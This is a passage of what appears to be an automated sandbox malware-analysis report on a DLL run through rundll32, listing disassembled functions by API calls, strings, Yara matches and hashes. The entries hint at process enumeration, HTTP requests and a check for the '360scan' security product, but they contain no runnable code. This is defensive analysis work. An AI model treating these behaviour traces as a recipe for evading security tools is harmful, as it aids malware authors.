                                                                                    • Opcode ID: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                    • Instruction ID: 37d746e663b56e28a6a3e394405e8b675d481f719bc3bdb0db42ce8d24bf20fd
                                                                                    • Opcode Fuzzy Hash: 566063b2480ce26a8a1017dda99dddd59a3f866f59b7cd308274edefec3830af
                                                                                    • Instruction Fuzzy Hash: 57316E31700A4886F6A29F25EC443E973A0FB8DBD5F548531B96A972A1DF39C7898700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$Size$CloseCreateHandleRead
                                                                                    • String ID:
                                                                                    • API String ID: 1601809017-0
                                                                                    • Opcode ID: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                    • Instruction ID: 513f97a3dac13d024bc23301dce07c49bc5a225dcf8c593d0dc48b4e525c804c
                                                                                    • Opcode Fuzzy Hash: 6c38b284369adc8e8a95ca7bd81b2def578c31ecd07c0865210070f76e2fb98a
                                                                                    • Instruction Fuzzy Hash: 2E21803260475487E7819F2AE8443997BA1F788FD0F658225EF6547BA4DF38C64ACB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@$??3@
                                                                                    • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                    • API String ID: 1245774677-781996053
                                                                                    • Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                    • Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
                                                                                    • Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
                                                                                    • Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@??3@
                                                                                    • String ID: Catalog_Entries$Num_Catalog_Entries
                                                                                    • API String ID: 1936579350-781996053
                                                                                    • Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                    • Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
                                                                                    • Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
                                                                                    • Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
                                                                                    • Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter$Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 950586405-0
                                                                                    • Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                    • Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
                                                                                    • Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
                                                                                    • Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateValue
                                                                                    • String ID: 360scan
                                                                                    • API String ID: 1818849710-2450673717
                                                                                    • Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                    • Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
                                                                                    • Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
                                                                                    • Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCreateHandleModuleProc
                                                                                    • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                    • API String ID: 1964897782-2994018265
                                                                                    • Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                    • Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
                                                                                    • Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
                                                                                    • Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AppendFileModuleNamePathmemset
                                                                                    • String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
                                                                                    • API String ID: 1620117007-2349577946
                                                                                    • Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                    • Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
                                                                                    • Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
                                                                                    • Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                                    • Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
                                                                                    • Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
                                                                                    • Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$??3@EnterLeave
                                                                                    • String ID:
                                                                                    • API String ID: 3906572401-0
                                                                                    • Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                                    • Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
                                                                                    • Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
                                                                                    • Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                    • String ID:
                                                                                    • API String ID: 4137211488-0
                                                                                    • Opcode ID: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
                                                                                    • Instruction ID: 7224584d1f76ccebbf78e21f16d0fbd8b3bb2fa7e969690ec2f1c3243b39cfd9
                                                                                    • Opcode Fuzzy Hash: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
                                                                                    • Instruction Fuzzy Hash: B8912F32A19B8097DA60DB15E4483DEB7B6F785384F500125FA8D43BAEDF7AC646CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: _errno
                                                                                    • String ID:
                                                                                    • API String ID: 2918714741-0
                                                                                    • Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                                    • Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
                                                                                    • Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
                                                                                    • Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2113159787.0000026387CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000026387CF0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_26387cf0000_rundll32.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HttpRequest$OpenSend$InternetOption
                                                                                    • String ID:
                                                                                    • API String ID: 664753792-0
                                                                                    • Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                                                                                    • Instruction ID: b785da1804db5cc28554928ba2730a8c762aaced3b5082919724f31f2aa2ab85
                                                                                    • Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
                                                                                    • Instruction Fuzzy Hash: 2861C376909B8096E760CB14F4583DEB7B2F389784F504126EB8943B69DFBEC649CB40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@memmove$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 232491532-0
                                                                                    • Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                                    • Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
                                                                                    • Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
                                                                                    • Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _swprintf_c_l.LIBCMT ref: 000000018006A6B0
                                                                                    • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
                                                                                    • memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memmove$_swprintf_c_l
                                                                                    • String ID:
                                                                                    • API String ID: 3930809162-0
                                                                                    • Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                                    • Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
                                                                                    • Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
                                                                                    • Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$Enter
                                                                                    • String ID:
                                                                                    • API String ID: 2978645861-0
                                                                                    • Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                                    • Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
                                                                                    • Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
                                                                                    • Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: ??2@memmove$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 232491532-0
                                                                                    • Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                                    • Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
                                                                                    • Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
                                                                                    • Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
                                                                                    • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
                                                                                    • ??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
                                                                                    • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
                                                                                    • memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memmove$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 2321372689-0
                                                                                    • Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                    • Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
                                                                                    • Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
                                                                                    • Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.2112534910.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                    • Associated: 00000006.00000002.2112329880.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112678084.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112715384.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112738519.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                    • Associated: 00000006.00000002.2112783993.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                    Similarity
                                                                                    • API ID: memmove$??3@
                                                                                    • String ID:
                                                                                    • API String ID: 2321372689-0
                                                                                    • Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
